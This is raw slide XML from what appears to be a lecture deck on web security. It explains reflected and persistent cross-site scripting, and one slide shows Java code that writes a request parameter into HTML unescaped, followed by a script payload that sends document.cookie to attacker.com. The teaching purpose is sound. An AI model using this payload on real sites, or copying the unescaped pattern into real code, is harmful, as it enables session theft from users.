                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B59FA3F-C79C-4053-820F-EBA7D1FD2FC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="5638800"/>
            <a:ext cx="4648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3" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667DA014-09F7-42F5-B4D3-7F66D30B3C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="5867400"/>
            <a:ext cx="449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4" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{723DC476-7519-4560-85FB-CEFB5C1581C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2498725" y="5827713"/>
            <a:ext cx="4197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b="1"/>
              <a:t>Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>: Start WPI session, parms -lmk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F15D4AF-A747-4538-BFAF-90ECAD11D4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2422525" y="5294313"/>
            <a:ext cx="4349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b="1"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>: “Terry, Brian, Jerry, Ann, Louis, …”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36367213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E0918E6-6F75-44F9-A259-8B6700D82998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="533400"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571F1719-3A1C-4EC2-959A-6DB789E699C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="3581400" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Example XSS Attack on External Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>A vulnerable site has links to a disreputable site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Disreputable site generates a script, which is inserted into the reputable company’s html response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>The result looks like a valid web page from the reputable company.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>E.g.: Error: Page not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Persistent XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>: Website is infected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44326DE4-981E-4742-A0DD-5E6CBED3A059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5976937" y="3603439"/>
            <a:ext cx="2024057" cy="376424"/>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32773" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE23618-6889-4D89-BA9B-7D780EC67DFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="4648200"/>
            <a:ext cx="2133583" cy="212656"/>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32774" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9695EA30-0230-4893-B827-9C9791FB9C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21002858">
            <a:off x="6291772" y="3484065"/>
            <a:ext cx="14287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Web access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>to product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32775" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92966E2-62FD-4D33-B334-93E70D351DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="389306">
            <a:off x="6130925" y="4797425"/>
            <a:ext cx="16827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Web Form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32778" name="Picture 15" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3BF905-E6CB-4F6A-9E59-3CD834D163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7620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9" name="Picture 16" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E746EB2-A17E-4BB4-8C52-E3B4F63991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7620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0" name="Picture 17" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{631BF87E-7D2E-4EC1-A379-0A40790C6B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7620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82" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD952168-513B-43AB-B8AA-6C77A2FB58DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2514600"/>
            <a:ext cx="0" cy="32766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2785" name="Line 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EFEE1D-35A0-4BA0-965E-F3DD48203CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4572000" y="4059238"/>
            <a:ext cx="1371600" cy="7620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32786" name="Text Box 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C55E27CA-7C56-4913-BC47-ADA34F648574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21414544">
            <a:off x="4679950" y="3795713"/>
            <a:ext cx="1149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reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32787" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D65605-02A4-471D-B14D-76C8C7EA8E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4605338" y="4495800"/>
            <a:ext cx="1371600" cy="15240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32788" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30B42625-5A06-4D57-A453-EAC515A43047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="325742">
            <a:off x="4679950" y="4624388"/>
            <a:ext cx="1222375"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Should be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>form, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>instead </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>payment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32789" name="Straight Arrow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21BD55AA-3A1A-46B6-BE95-E7C8CEECFEEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4558871" y="3091048"/>
            <a:ext cx="1445486" cy="241073"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32790" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0951E98D-67E4-4A7D-A4F0-8D9242A09465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="530624">
            <a:off x="4574876" y="3162396"/>
            <a:ext cx="128746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Create link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>or data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47886028-22DB-4525-A99D-CA036FED91F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667260" y="1897063"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05EAC066-7F21-4FCF-9F7F-36CAA4BA2F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964236" y="1687474"/>
            <a:ext cx="1182191" cy="4448152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{145BF116-FEFE-4C98-A020-5148689A836B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462756" y="1835162"/>
            <a:ext cx="1076485" cy="4448152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1712414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48FF682-4704-4275-9271-28C427B8CBF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Example Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2099841-3453-4BCC-9038-2F2FB878943F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form input not validated at server.  Example good input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(String) page += "&lt;input name=‘identification' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“ID") + "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker modifies ‘ID’ in browser to execute script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>foo='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;'. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2302582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E0918E6-6F75-44F9-A259-8B6700D82998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="533400"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571F1719-3A1C-4EC2-959A-6DB789E699C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="3352800" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Reflected XSS Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>An attack link is installed on an infected webserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
